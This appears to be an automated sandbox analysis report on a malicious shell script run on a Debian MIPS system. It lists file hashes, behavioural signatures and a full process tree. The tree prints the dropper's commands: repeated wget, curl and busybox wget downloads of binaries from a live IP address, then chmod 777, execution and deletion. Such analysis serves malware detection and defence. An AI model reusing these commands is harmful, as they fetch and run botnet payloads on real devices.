Analysis
-
max time kernel
125s -
max time network
127s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
14-11-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
-
Size
10KB
-
MD5
920017685299c34fe40ed0d31390a654
-
SHA1
15be0738ab44434517b3a1bb41d0ba9752f0da28
-
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
-
SHA512
345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
-
SSDEEP
192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 804 chmod 891 chmod 897 chmod 777 chmod 933 chmod 867 chmod 885 chmod 915 chmod 873 chmod 879 chmod 909 chmod 939 chmod 951 chmod 810 chmod 828 chmod 851 chmod 927 chmod 963 chmod 969 chmod 981 chmod 741 chmod 861 chmod 945 chmod 957 chmod 975 chmod 747 chmod 903 chmod 921 chmod -
Executes dropped EXE 28 IoCs
Processes:
49irlYlhW1pQmwlDaVrLaKzYecToHyUObHqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwgZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt49irlYlhW1pQmwlDaVrLaKzYecToHyUObHlZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQioc pid Process /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 742 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 748 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 778 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 805 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 811 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 829 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 853 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 862 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 868 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 874 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 880 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 886 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 892 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 898 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 904 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 910 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 916 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 922 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 928 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 934 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 940 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 946 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 952 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 958 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 964 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 970 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 976 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 982 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlbusyboxxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztcurlbusyboxwgetrmwgetxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztrmpid Process 895 curl 896 busybox 898 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 961 curl 962 busybox 894 wget 899 rm 960 wget 964 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 965 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl
Processes
-
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:718
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:739
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:746
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:749
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:750
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:771
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:781
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:782
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:801
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:809
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:823
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:832
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:833
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:848
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:860
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:866
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:872
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:878
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:884
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:890
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:898
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:902
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:908
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:914
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:920
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:923
-
-
